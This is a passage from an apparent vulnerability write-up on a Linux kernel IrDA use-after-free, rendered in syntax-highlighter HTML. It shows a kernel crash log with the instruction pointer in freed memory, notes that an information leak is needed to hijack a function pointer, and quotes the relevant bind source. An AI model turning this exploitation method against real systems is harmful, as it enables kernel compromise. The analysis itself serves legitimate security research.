class=\"crayon-cn\">0010<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">DS<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ES<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">CR0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000080050033<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-27\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">CR2<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ffff88023623ad20 <\/span><span class=\"crayon-v\">CR3<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000235e97000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">CR4<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00000000000006f0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-28\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">DR0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">DR1<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">DR2<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000000<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-29\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">DR3<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">DR6<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00000000fffe0ff0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">DR7<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000400<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-30\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Call <\/span><span class=\"crayon-v\">Trace<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-31\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">proc_sys_make_inode<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0xc1<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x100<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-32\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">proc_sys_lookup<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0xcf<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x140<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-33\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">lookup_slow<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x91<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x140<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-34\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">walk_component<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x195<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x320<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-35\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">security_inode_permission<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x3c<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x60<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-36\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">link_path_walk<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x18b<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x5c0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-37\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">path_init<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x1d4<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x330<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-38\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">path_openat<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0xe3<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x1320<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-39\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">do_filp_open<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x79<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0xd0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-40\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">do_nanosleep<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x92<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0xf0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-41\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">kmem_cache_alloc<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x2f<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x150<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-42\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">getname_flags<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x51<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x1f0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-43\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">do_sys_open<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x116<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x1f0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-44\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">SyS_openat<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0xf<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x20<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-45\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">entry_SYSCALL_64_fastpath<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x13<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x94<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-46\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RIP<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0033<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0x44769e<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-47\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RSP<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">002b<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">00007ffc4d7f1b00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">EFLAGS<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00000246<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ORIG_RAX<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000101<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-48\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RAX<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ffffffffffffffda <\/span><span class=\"crayon-v\">RBX<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00000000006d18d8<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RCX<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">000000000044769e<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-49\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RDX<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RSI<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00000000004a8a46<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RDI<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ffffffffffffff9c<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-50\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RBP<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000070<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R08<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000001<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R09<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">000000000000000c<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-51\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R10<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R11<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000246<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R12<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00000000006d1880<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-52\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R13<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000065<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R14<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00000000006d18d8<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R15<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000000<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-53\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Code<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-e\">cc <\/span><span class=\"crayon-i\">cc<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-cn\">68<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-54\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RIP<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xffff88023623ad20<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RSP<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ffffc90001437b60<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-55\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">CR2<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ffff88023623ad20<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-56\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">end<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">trace<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">531b1224dce05ac9<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-57\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Kernel <\/span><span class=\"crayon-v\">panic<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">syncing<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Fatal <\/span><span class=\"crayon-i\">exception<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f369705235707-58\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Kernel <\/span><span class=\"crayon-v\">Offset<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">disabled<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f369705235707-59\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8.642882<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Rebooting <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">seconds<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0206 seconds] -->  <\/p>\n<p>In order to completely control the execution, we must look for an object holds a pointer to a function pointers, which can be achieved by information leak.<\/p>\n<p>The first &#8220;bug&#8221; (double bind and losing the reference to ias_obj) is not required to exploit UAF (reinsertion on the same object into the hashbin queue). It has no relevance to the exploitation chain demonstrated in the PoC and UAF can be exploited without it.<\/p>\n<p>Binding the same socket would result in the following path taken (since self-&gt;tsap is already set):<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5bad57622f378462779655\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> err = irda_open_tsap(self, addr-&gt;sir_lsap_sel, addr-&gt;sir_name);  if (err &lt; 0) {   irias_delete_object(self-&gt;ias_obj);   self-&gt;ias_obj = NULL;   goto out;  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f378462779655-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f378462779655-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f378462779655-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f378462779655-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f378462779655-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f378462779655-6\">6<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5bad57622f378462779655-1\"><span class=\"crayon-v\">err<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">irda_open_tsap<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">sir_lsap_sel<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">sir_name<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f378462779655-2\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">err<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f378462779655-3\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">irias_delete_object<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">ias_obj<\/span><span class=\"crayon-sy\">)<\/span><span 